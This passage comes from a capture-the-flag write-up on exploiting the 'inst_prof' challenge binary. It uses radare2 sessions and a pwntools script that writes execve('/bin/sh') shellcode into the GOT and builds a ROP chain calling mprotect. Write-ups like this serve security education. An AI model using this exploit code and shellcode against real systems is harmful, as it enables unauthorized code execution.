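def combine_tsc(edx: int, eax: int) -> int:
    """rdtsc splits the counter across edx:eax; rebuild the 64-bit value."""
    return (edx << 32) | eax

def parse_timing(reply: bytes) -> int:
    """Decode the 8 raw bytes do_test writes after each run."""
    (cycles,) = struct.unpack("<Q", reply)
    return cycles

start = combine_tsc(0x1, 0xfffffff0)    # made-up reading before call rbx
end = combine_tsc(0x2, 0x00000010)      # made-up reading after call rbx
reply = struct.pack("<Q", end - start)  # what write(1, rbp-0x18, 8) would send
print(parse_timing(reply))              # 32
```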

After this, the executable page holding the loop and our custom bytes is freed, and the whole process repeats endlessly with subsequent calls to do_test.


The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.

After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.

The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2 binary that comes with radare just to get an idea of what kind of instructions we'd be able to use:

-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i; do echo -n "$i = "; 
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
50 = push rax
51 = push rcx
52 = push rdx
53 = push rbx
54 = push rsp
55 = push rbp
56 = push rsi
57 = push rdi
58 = pop rax
59 = pop rcx
5a = pop rdx
5b = pop rbx
5c = pop rsp
5d = pop rbp
5e = pop rsi
5f = pop rdi
6c = insb byte [rdi], dx
6d = insd dword [rdi], dx
6e = outsb dx, byte [rsi]
6f = outsd dx, dword [rsi]
90 = nop
91 = xchg eax, ecx
92 = xchg eax, edx
93 = xchg eax, ebx
94 = xchg eax, esp
95 = xchg eax, ebp
96 = xchg eax, esi
97 = xchg eax, edi
98 = cwde
99 = cdq
9b = wait
9c = pushfq
9d = popfq
9e = sahf
9f = lahf
a4 = movsb byte [rdi], byte ptr [rsi]
a5 = movsd dword [rdi], dword ptr [rsi]
a6 = cmpsb byte [rsi], byte ptr [rdi]
a7 = cmpsd dword [rsi], dword ptr [rdi]
aa = stosb byte [rdi], al
ab = stosd dword [rdi], eax
ac = lodsb al, byte [rsi]
ad = lodsd eax, dword [rsi]
ae = scasb al, byte [rdi]
af = scasd eax, dword [rdi]
c3 = ret
c9 = leave
cb = retf
cc = int3
cf = iretd
d6 = salc
d7 = xlatb
ec = in al, dx
ed = in eax, dx
ee = out dx, al
ef = out dx, eax
f1 = int1
f4 = hlt
f5 = cmc
f8 = clc
f9 = stc
fa = cli
fb = sti
fc = cld
fd = std
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i; do echo -n "$i = "; 
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
<lots of assembly instructions redacted>

I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16,777,216 (256^3) candidate byte sequences to evaluate.
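The search space grows by a factor of 256 with every extra byte, which is why brute-force enumeration stops being practical so quickly when each candidate costs one rasm2 invocation:

```python
# Number of candidate byte sequences for each instruction length.
counts = {length: 256 ** length for length in range(1, 5)}

for length, count in counts.items():
    print(length, count)
# 1 256
# 2 65536
# 3 16777216
# 4 4294967296
```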

Meanwhile I asked my friend if he could see if any of the registers' states were saved in between the do_test loops.

It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.

Revelation Registered

The breakthrough came when he discovered that the r15 and r14 registers were preserved across iterations of the do_test loop. I think he verified using a simple sequence like this:

[0x7f2d4994a000]> pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            ;-- rip:
            0x7f2d4994a000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7f2d4994a005      90             nop
        |   0x7f2d4994a006      90             nop
        |   0x7f2d4994a007      90             nop
        |   0x7f2d4994a008      90             nop
        |   0x7f2d4994a009      83e901         sub ecx, 1
        `=< 0x7f2d4994a00c      75f7           jne 0x7f2d4994a005
            0x7f2d4994a00e      c3             ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
[0x7f2d4994a000]> dr r15=0xdeadbeef
0x00000000 ->0xdeadbeef
[0x7f2d4994a000]> dc
[0x7f2d4994a000]> pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            ;-- rip:
            0x7f2d4994a000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7f2d4994a005      90             nop
        |   0x7f2d4994a006      90             nop
        |   0x7f2d4994a007      90             nop
        |   0x7f2d4994a008      90             nop
        |   0x7f2d4994a009      83e901         sub ecx, 1
        `=< 0x7f2d4994a00c      75f7           jne 0x7f2d4994a005
            0x7f2d4994a00e      c3             ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15

dr can also directly set register values (in addition to displaying them) using the dr reg=... notation, as shown in the dr r15=0xdeadbeef command above.

When we ran the dc command above, we had the STDIN of the binary attached to python so we could send it arbitrary bytes whenever the program called read() (0x90 * 4 in this case).

We can see that after setting the register value (r15 in this case) and continuing execution with dc, the value is still there when execution arrives at the loop section a second time.

I also verified that r13 was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:

-> % rasm2 -ax86.ks -b64 'mov r15, rsp'
-> % rasm2 -ax86.ks -b64 'mov [r15], rsp'
-> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp'
-> % rasm2 -ax86.ks -b64 'pop r15'         
-> % rasm2 -ax86.ks -b64 'shl r15, 0x20'
-> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000'
-> % rasm2 -ax86.ks -b64 'ret'            

We realized here that there were some (what we called) absolute instructions and some relative instructions; some instructions like mov were not affected by being executed 0x1000 times in the loop, while others, like shl r15, 0x20 would not survive being run multiple times in a loop.

This was tied to the instruction length being 3 or 4 bytes: instructions that were 3 bytes in length could have a ret appended (one byte: c3) to escape the loop after a single execution, while instructions that were 4 bytes in length had to be run all 0x1000 times.

Instructions that were larger than 4 bytes (like the sub rsp, 0x1000 above) could not be run.
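The length rule above can be sketched as a small helper. This is only an illustration and not part of our solver: the name frame_instruction is made up, it is written for Python 3 using only the standard library, and the byte encodings are the ones that appear elsewhere in this writeup.

```python
LOOP_COUNT = 0x1000  # iterations of the do_test loop
RET = b"\xc3"        # one-byte ret

def frame_instruction(code):
    """Return (payload, times_executed) for the 4-byte slot.

    Hypothetical helper: a 3-byte instruction is padded with ret so it
    runs once; a 4-byte instruction runs on every loop iteration.
    """
    if len(code) == 3:
        return code + RET, 1
    if len(code) == 4:
        return code, LOOP_COUNT
    raise ValueError("only 3- or 4-byte instructions are handled here")

# add r14, r14 (3 bytes) escapes the loop after one execution
print(frame_instruction(b"\x4d\x01\xf6"))
# mov r13, [rsp] (4 bytes) gives the same result no matter how often it runs
print(frame_instruction(b"\x4c\x8b\x2c\x24"))
```

Anything that changes its result when repeated (add, inc, shl) has to fit in 3 bytes, while idempotent instructions like a plain mov can use all 4.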

While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:
        p.send(writeCmd + b)
        p.send(incCmd + ret)

This function would write data to the address stored in the r15 register, incrementing it to keep the cursor position current after each written byte.
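To make the byte layout of this primitive easier to see, here is a standalone sketch that only builds the 4-byte payloads instead of sending them. The function name build_write_payloads is hypothetical, and the sketch assumes Python 3 bytes rather than the python2 strings used in our script.

```python
RET = b"\xc3"
WRITE_CMD = b"\x41\xc6\x07"  # mov byte [r15], imm8 (imm8 is the 4th byte)
INC_CMD = b"\x49\xff\xc7"    # inc r15

def build_write_payloads(data):
    """Return the list of 4-byte payloads that would write data at [r15]."""
    payloads = []
    for value in data:
        # 4 bytes: runs 0x1000 times, but always stores the same byte
        payloads.append(WRITE_CMD + bytes([value]))
        # 3 bytes + ret: runs once and advances the cursor by one
        payloads.append(INC_CMD + RET)
    return payloads

payloads = build_write_payloads(b"/bin/sh")
print(len(payloads))
print(payloads[0].hex(), payloads[1].hex())
```

Each written byte costs two trips through the loop: one repeated (but harmless) store and one single increment.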

At this point we were able to write data as long as the address in r15 was in a writable segment, however we needed a game plan of what to write where (as well as how to get what address into r15).

Plan A

The first plan I pitched was that of performing a ret2libc-type exploit where we simply called libc's system function with /bin/bash as the target. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system, and making a small ROP chain to jump to this function.

When we started down this road, it became apparent that there were some formidable obstacles in our way, mainly PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect was being called set in. And so Plan B took form.

Plan B

Once we realized that mprotect was called by the make_page_executable function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.

In theory.

We ruled out the page allocated by alloc_page since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable, however we were unsuccessful (attributing the lack of success to some "unknown" feature of NX, whereas I'd learn later that we were specifying an unaligned address to mprotect). It was at this point that we called it a night and I went to bed dreaming of armored assembly.

The Next Day

After sleeping on it, I solidified the plan as follows:

1) Find writable region of memory
    a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
3) Set up call to `mprotect` through the `make_page_executable` call
    a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

Reflecting upon the previous day's work, I realized that I needed a region of memory that was always writable, and which would always be at a constant offset from the .text section.

I originally performed all of the following work on a writable section located just above (visually; lower memory address) the page allocated by alloc_page and got it working reliably on my local machine. However, after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, but I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but substituting the GOT section as my target rather than the failed one.

The Global Offset Table remained writable (due to only partial RELRO) and was part of the contiguous section of memory mapped with the .text section. And fortunately there was a reference to the .text section located at the top of the stack each time we entered the loop-executable section:

[0x562e80db3b16]> pd 2
            ;-- rip:
            0x562e80db3b16 b    ffd3           call rbx
            0x562e80db3b18      0f31           rdtsc
[0x562e80db3b16]> ds; pd 8
            ;-- map.unk2._rw_:
            ;-- rbx:
            ;-- rdi:
            0x7fa9a763e000      b900100000     mov ecx, 0x1000         ; rsi
        .-> 0x7fa9a763e005      90             nop
        |   0x7fa9a763e006      90             nop
        |   0x7fa9a763e007      90             nop
        |   0x7fa9a763e008      90             nop
        |   0x7fa9a763e009      83e901         sub ecx, 1
        `=< 0x7fa9a763e00c      75f7           jne 0x7fa9a763e005
            0x7fa9a763e00e      c3             ret
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18                       .;...V..

Notice that the address of the instruction after call rbx (0x562e80db3b18) is at the top of the stack when we enter our loop-executable section.

This is in fact the return address within do_test pushed by the call rbx instruction. To check that this return address was a constant offset from the Global Offset Table, I simply subtracted the return address from the GOT address, and re-ran the executable:

[0x7fa9a763e000]> iS~got
idx=22 vaddr=0x562e80fb4fd8 paddr=0x00001fd8 sz=40 vsz=40 perm=--rw- name=.got
idx=23 vaddr=0x562e80fb5000 paddr=0x00002000 sz=112 vsz=112 perm=--rw- name=.got.plt
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8  0x0000562e80db3b18                       .;...V..
[0x7fa9a763e000]> ? section..got.plt - [rsp]
2102504 0x2014e8 010012350 2M 20000:04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504.0 2102504.000000f 2102504.000000

The iS command is the information on Sections command, which displays addresses of the different sections mapped by the process.

The ? command is used to perform math operations and returns the answer in a wide variety of formats.

The ~ character appended to any command will filter the output much like grep does.

I saw that the GOT address was exactly 0x2014e8 past the return address. Closing and re-opening the program did not change this; however PIE did ensure that the text section's base address was randomized on each execution (save for the last 12 bits). As long as I only used offsets relative to the text section address (provided as a return address from our looped section) then PIE (and ASLR) wouldn't do much to mitigate my efforts.
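The arithmetic behind this is simple enough to check by hand, and a short sketch makes the rebasing explicit. The helper name got_plt_from_return_address is made up for illustration; the two addresses are copied from the r2 output above, and the code is plain Python 3.

```python
# Offset reported by r2 for: section..got.plt - [rsp]
GOT_PLT_OFFSET = 0x2014e8

def got_plt_from_return_address(return_address):
    """Rebase .got.plt from the do_test return address found at [rsp]."""
    return return_address + GOT_PLT_OFFSET

# Values from the r2 session above
return_address = 0x562e80db3b18
got_plt = 0x562e80fb5000

assert got_plt_from_return_address(return_address) == got_plt
# PIE slides the image in page-sized steps, so the low 12 bits never change
print(hex(return_address & 0xfff), hex(got_plt & 0xfff))
```

Because only the base moves between runs, any address in the image can be reached the same way once one pointer into it is known.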

Seeing from our earlier dm output above of the memory map that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.

And So ROP Begins...

The next challenge was how I'd get the address into the r15 register. I knew I could simply load the address from rsp using mov r15, [rsp], which was a 4 byte instruction. But then I'd need to add to it the offset 0x2014e8 to get our GOT address.

My first thought was to simply use the inc r15 command several (hundred) times, but even utilizing the 0x1000 loops, it would take 0x2014e8 / 0x1000 == 513 calls to the loop to increment it enough times. Instead, I used the loop counter itself (rsi == 0x1000) as a starting value and doubled it 9 times to get the value into another placeholder register. This is where the exploit script started to take form, and here were the first few lines:

#!/usr/bin/env python2

from pwn import *

#open the process
p = process("./inst_prof")

#print program prompt

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6\xc3") #add r14, r14

Note that for both of the add instructions the last byte is 0xc3, which is the ret instruction; this short-circuits the loop, letting the addition take place exactly 1 time.

To generate the assembled bytes for these instructions I used the rasm2 binary (which comes with radare2) with the keystone assembler: rasm2 -ax86.ks -b64 "add r14, r14". To install keystone assembler, use r2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone from a terminal prompt.

It was here I decided to test the script. To do so I added the import from IPython import embed, and added embed() to the script. This allowed me to pause execution (at any place within the script) and attach the r2 debugger to the running process to inspect its state. I simply ran the script with ./solver.py, and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2:

-> % r2 -d 14198
[0x7f30b1ae4360]> dr r13; dr r14; dr r15

And lo and behold, I had my text section reference as well as the start of my offset calculation in r13 and r14 respectively.

To get the rest of the offset into the r14 register, I added a few more lines to the script to add 0x1000, 0x246 * 2, and finally increment 0x5c more times to get the desired value:

#add another 0x1000 to r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde\xc3") #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6\xc3") #inc r14

I'd noticed that every time we entered the loop section the r11 register was set to 0x246, which is the value added by the add r14, r11 line above.
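To double-check the offset arithmetic without a debugger, the register operations can be replayed in plain Python. This is a sketch under the assumptions stated in this writeup (r14 starts at 0, rsi is 0x1000 and r11 is 0x246 on entry); the function name build_got_offset is mine and is not part of the solver.

```python
def build_got_offset(rsi=0x1000, r11=0x246):
    """Replay the register arithmetic; returns (r14, number of 4-byte sends)."""
    r14 = 0
    sends = 0

    r14 += rsi              # add r14, rsi
    sends += 1
    for _ in range(9):      # add r14, r14 (doubles r14 each time)
        r14 += r14
        sends += 1
    r14 += rsi              # add r14, rsi
    sends += 1
    for _ in range(2):      # add r14, r11
        r14 += r11
        sends += 1
    for _ in range(0x5c):   # inc r14
        r14 += 1
        sends += 1
    return r14, sends

offset, sends = build_got_offset()
print(hex(offset), sends)
```

The replay lands on 0x2014e8 after 105 sends, compared with the 500+ trips through the loop that incrementing alone would have needed.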

At this point I should have both the text section address in r13, as well as the offset needed to reference the GOT in r14. To test, I added the following line to my script to add r14 to r13:

p.send("\x4d\x01\xf5\xc3") #add r13, r14

Then ran ./solver.py and attached with r2:

[0x7fb876853360]> dr r13; dr r14; dr r15
[0x7fb876853360]> ? section..got.plt
94056963182592 0x558b57e11000 02530552770210000 87597.4G b57e1000:0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592.0 94056965210112.000000f 94056963182592.000000

Success! I had successfully calculated the offset from the loop section's return address to the start of the GOT, and loaded it into one of our scratch registers.

Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:

[0x7fb876853360]> pxq @ section..got.plt
0x558b57e11000  0x0000000000201e08  0x00007fb876d3d0f0   .. ........v....
0x558b57e11010  0x00007fb876b2e5f0  0x00007fb8768533b0   ...v.....3.v....
0x558b57e11020  0x00007fb87685ca50  0x0000558b57c0f7d6   P..v.......W.U..
0x558b57e11030  0x00007fb876853350  0x00007fb876795420   P3.v.... Tyv....
0x558b57e11040  0x0000558b57c0f806  0x00007fb87685cb20   ...W.U.. ..v....
0x558b57e11050  0x00007fb87685cb50  0x0000558b57c0f836   P..v....6..W.U..
0x558b57e11060  0x0000558b57c0f846  0x0000558b57c0f856   F..W.U..V..W.U..
0x558b57e11070  0x0000000000000000  0x0000558b57e11078   ........x..W.U..
0x558b57e11080  0x0000000000000000  0x0000000000000000   ................
0x558b57e11090  0x0000000000000000  0x0000000000000000   ................
0x558b57e110a0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110b0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110c0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110d0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110e0  0x0000000000000000  0x0000000000000000   ................
0x558b57e110f0  0x0000000000000000  0x0000000000000000   ................

I selected the address 0x558b57e110a0, which was 0xa0 past the GOT start. Since I'd learned that mprotect would only work on addresses that were multiples of 0x1000, I kept the GOT address in r13 for use in the ROP chain that I was planning to construct.
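The alignment requirement is easy to illustrate: mprotect wants the start of a page, so any address inside the page has to be rounded down first. A minimal sketch, assuming the 0x1000 page size used by make_page_executable; page_align_down is a hypothetical helper name, and the addresses are the ones from the dump above.

```python
PAGE_SIZE = 0x1000

def page_align_down(address):
    """Round an address down to the start of its page."""
    return address & ~(PAGE_SIZE - 1)

got = 0x558b57e11000          # section..got.plt in the run shown above
second_stack = got + 0xa0     # where the shellcode and ROP chain will live

# The GOT start is already page aligned, so it can be passed to mprotect as-is
assert page_align_down(got) == got
# The second stack is not aligned, but it lives in the same page
assert page_align_down(second_stack) == got
print(hex(page_align_down(second_stack)))
```

This is the same mistake we made with the stack the night before: the address we passed was not a multiple of 0x1000.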

Second Stack

Now that I had a reference to a writable region of memory, I set r15 to point 0xa0 past the GOT, where I'd place all my data for the exploit, including the shellcode and the ROP chain.

First I set r14 to 0xa0:

p.send("\x4d\x31\xf6" + ret) #xor r14, r14

for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

It was here that I decided I wanted an easy way to distinguish the 3 and 4 byte instructions, so I refactored all the instructions with ret bytes to instead append a ret variable where ret == '\xc3'.

Then set r15 to r13 + r14:

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13

#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

Since my plan was to use r15 as the cursor into the second stack, I saved the base address of the second stack in r14:

p.send("\x4d\x89\xfe" + ret) #mov r14, r15

I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr() function and directive to my solver script. This is what it looked like at that point:

#!/usr/bin/env python2

from pwn import *

ret = "\xc3"

def writeByteStr(byteString):
    writeCmd = '\x41\xc6\x07'   #mov byte [r15], {}
    incCmd = '\x49\xff\xc7'     #inc r15
    for b in byteString:

        p.send(writeCmd + b)
        p.send(incCmd + ret)

#open the process
p = process("./inst_prof")

#print program prompt

#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]

#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#and double it 9 times:
for x in range(9):
    p.send("\x4d\x01\xf6" + ret) #add r14, r14

#add another 0x1000 to r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi

#0x246 + 0x246 = 0x48c
for x in range(2):
    p.send("\x4d\x01\xde" + ret) #add r14, r11

#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
    p.send("\x49\xff\xc6" + ret) #inc r14

p.send("\x4d\x01\xf5" + ret) #add r13, r14

p.send("\x4d\x31\xf6" + ret) #xor r14, r14

for x in range(0xa0):
    p.send("\x49\xff\xc6" + ret) #inc r14

#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13

#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14

#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15

#write shellcode to second stack
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68' + \
    '\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')

And I launched it so I could inspect with r2 to see if everything was in working order:

-> % r2 -d 5703
[0x7f5463e3c360]> dr r13; dr r14; dr r15
[0x7f5463e3c360]> pxq 0x30 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289   H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853   n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f   .PWH...;........

Excellent. We can see that r13 holds our GOT reference, while r14 points to the top of our second stack, and r15 points just past the last byte written (05 from my shellcode).

By this point I'd solved problems 1 and 2:

1) Find writable region of memory
    a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory

And now had steps 3 and 4 left:

3) Set up call to `mprotect` through the `make_page_executable` call
    a) Need to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode

To Call or Not to Call

Having looked at the call to make_page_executable from before, we saw that the first argument to mprotect is passed as an argument to make_page_executable in the rdi register. Therefore I needed to find a pop rdi gadget that I'd call prior to calling make_page_executable in the ROP chain.

Fortunately, r2 has a handy ROP search tool:

[0x7f5464323000]> s main
[0x558ef8a53860]> dr r13; dr r14; dr r15
[0x558ef8a53860]> /R/ pop rdi
  0x558ef8a53bc3                 5f  pop rdi
  0x558ef8a53bc4                 c3  ret

[0x558ef8a53860]> pxq 8 @ rsp
0x7ffcaacd0eb8  0x0000558ef8a53b18                       .;...U..
[0x558ef8a53860]> ? 0x558ef8a53bc3 - [rsp]
171 0xab 0253 171 0000:00ab 171 "\xab" 10101011 171.0 171.000000f 171.000000

/R/ allows searching for ROP gadgets using a regular expression.

With the /R/ command above, I use the gadget search tool to find a pop rdi gadget, and then calculate its offset from the return address in [rsp], showing that the gadget is 0xab past the return address.

At this point I needed an additional qword of scratch space to work with, so I moved my shellcode up by 8 bytes, leaving r14 pointing to a spare qword on my second stack, into which I wrote the GOT address. With this code change, the state of my registers and second stack went from:

r13 == GOT address
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == shellcode

to:

r13 == scratch
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == GOT address
[r14+8] == shellcode

Or to illustrate with radare, it went from:

[0x558ef8a53860]> dr r13; dr r14; dr r15
[0x558ef8a53860]> pxq 0x40 @ r14
0x558ef8c550a0  0x4850ec8948c03148  0x69622fffbb48e289   H1.H..PH..H../bi
0x558ef8c550b0  0x08ebc14868732f6e  0x89485250e7894853   n/shH...SH..PRH.
0x558ef8c550c0  0x3bb0e689485750e2  0x000000000000050f   .PWH...;........
0x558ef8c550d0  0x0000000000000000  0x0000000000000000   ................

to:

[0x55eefe549b16]> dr r13; dr r14; dr r15
[0x55eefe549b16]> pxq 0x40 @ r14
0x55eefe74b0a0  0x000055eefe74b000  0x4850ec8948c03148   ..t..U..H1.H..PH
0x55eefe74b0b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x55eefe74b0c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x55eefe74b0d0  0x000000000000050f  0x0000000000000000   ................

Now that the GOT address was saved at [r14], this freed up r13 to do some more offset calculation needed for the pop rdi gadget I found.

I simply needed [rsp] + 0xab to start my rop chain, which I accomplished via:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
    p.send("\x49\xff\xc5" + ret) #inc r13

#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret)    #mov [r15], r13

r15 now points to the start of our ROP chain, whose first entry is the pop rdi gadget's address. Since ROP depends fully on the state of the rsp register (and the memory region it points to), we have to make sure that the pop rdi gadget will pop the correct value into rdi. That value is the argument we want to supply to make_page_executable, namely the page-aligned address of the GOT we want to mark as executable.

So I load this from our previously saved location at r14 into r13, and write that to our second stack plus 8:

p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08")    #mov [r15+8], r13

At this point, our second stack looks like this (logically):

+------------------------+ ;r14
|       GOT address      |     
|                        |
|        Shellcode       |
|                        |
+------------------------+ ;r15
|      pop rdi gadget    |
|       GOT address      |

And with radare2:

[0x55ba1eb91b16]> dr r13; dr r14; dr r15
[0x55ba1eb91b16]> pxq 0x40 @ r14
0x55ba1ed930a0  0x000055ba1ed93000  0x4850ec8948c03148   .0...U..H1.H..PH
0x55ba1ed930b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x55ba1ed930c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x55ba1ed930d0  0x55ba1eb91bc3050f  0x55ba1ed930000000   .......U...0...U
[0x55ba1eb91b16]> pxq 0x20 @ r15
0x55ba1ed930d2  0x000055ba1eb91bc3  0x000055ba1ed93000   .....U...0...U..
0x55ba1ed930e2  0x0000000000000000  0x0000000000000000   ................
[0x55ba1eb91b16]> pd 2 @ [r15]
            0x55ba1eb91bc3      5f             pop rdi
            0x55ba1eb91bc4      c3             ret

Note that the value in r15 is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the first pxq output at r14. This is why I repeat the pxq at the r15 register, where the pop rdi gadget and GOT address are more easily seen and recognized.

All that's left is to add the mprotect call and our shellcode address to the ROP chain.

To do that, we have to calculate the offset from [rsp] to make_page_executable:

[0x7f88cc42b000]> ? sym.make_page_executable - [rsp]
-248 0xffffffffffffff08 01777777777777777777410 17179869184.0G fffff000:0f08 -248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 -248.0 -248.000000f -248.000000
[0x7f88cc42b000]> ? [rsp] - sym.make_page_executable
248 0xf8 0370 248 0000:00f8 248 "\xf8" 11111000 248.0 248.000000f 248.000000

Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8 to get the address of make_page_executable:

p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
    p.send("\x49\xff\xcd" + ret) #dec r13

And then add this to our ROP chain:

p.send("\x4d\x89\x6f\x10")    #mov [r15+0x10], r13
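Both gadget addresses come from the same return address, just with offsets in opposite directions. The following sketch restates that in plain Python 3; gadget_addresses is a hypothetical helper, and the example return address is the one seen at [rsp] in the gadget search session earlier.

```python
POP_RDI_OFFSET = 0xab                 # pop rdi; ret is past the return address
MAKE_PAGE_EXECUTABLE_OFFSET = -0xf8   # make_page_executable is before it

def gadget_addresses(return_address):
    """Derive both ROP targets from the do_test return address at [rsp]."""
    return {
        "pop_rdi": return_address + POP_RDI_OFFSET,
        "make_page_executable": return_address + MAKE_PAGE_EXECUTABLE_OFFSET,
    }

addresses = gadget_addresses(0x558ef8a53b18)
for name, address in sorted(addresses.items()):
    print(name, hex(address))
```

In the solver these offsets are applied with 0xab inc r13 and 0xf8 dec r13 instructions, since an add or sub with an immediate would not fit alongside a ret in the 4 bytes we are allowed.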

Now the second stack + rop chain looks like this:

+--------------------------------+ ;r14
|           GOT address          |     
|                                |
|            Shellcode           |
|                                |
+--------------------------------+ ;r15
|          pop rdi gadget        |
|           GOT address          |
|    make_page_executable gadget |

We simply need to get our shellcode address at the end of this rop chain, and then set rsp to the start of our rop chain.

    #save current second stack pointer into r13:
    p.send("\x4d\x89\xfd" + ret) #mov r13, r15

    #advance pointer 3 qwords
    for x in range(0x18):
        p.send("\x49\xff\xc5" + ret) #inc r13

    #point r14 to our shellcode
    for x in range(0x8):
        p.send("\x49\xff\xc6" + ret) #inc r14

    #and write shellcode address here:
    p.send("\x4d\x89\x75\x00") #mov [r13], r14

I had originally tried mov [r15+0x18], [r14+0x8]; however, it turns out x86 can't encode a mov with two memory operands, so I ended up removing (unnecessarily) both dereferences by splitting the instruction into two explicit movs. I could have avoided working with the second stack pointer (through r13) and simply used mov [r15+0x18], r14, but at the time I didn't notice this.

Now the second stack should be set up like so:

|           GOT address          |     
+--------------------------------+ ;r14
|                                |
|            Shellcode           |
|                                |
+--------------------------------+ ;r15
|          pop rdi gadget        |
|           GOT address          |
|    make_page_executable gadget |
+--------------------------------+ ;r13
|       <shellcode address>      |

And we verify:

[0x7f0e471a5000]> dr r13; dr r14; dr r15
[0x7f0e471a5000]> pxq 0x60 @ r14 - 0x8
0x56103a1800a0  0x000056103a180000  0x4850ec8948c03148   ...:.V..H1.H..PH
0x56103a1800b0  0x69622fffbb48e289  0x08ebc14868732f6e   ..H../bin/shH...
0x56103a1800c0  0x89485250e7894853  0x3bb0e689485750e2   SH..PRH..PWH...;
0x56103a1800d0  0x561039f7ebc3050f  0x56103a1800000000   .....9.V.....:.V
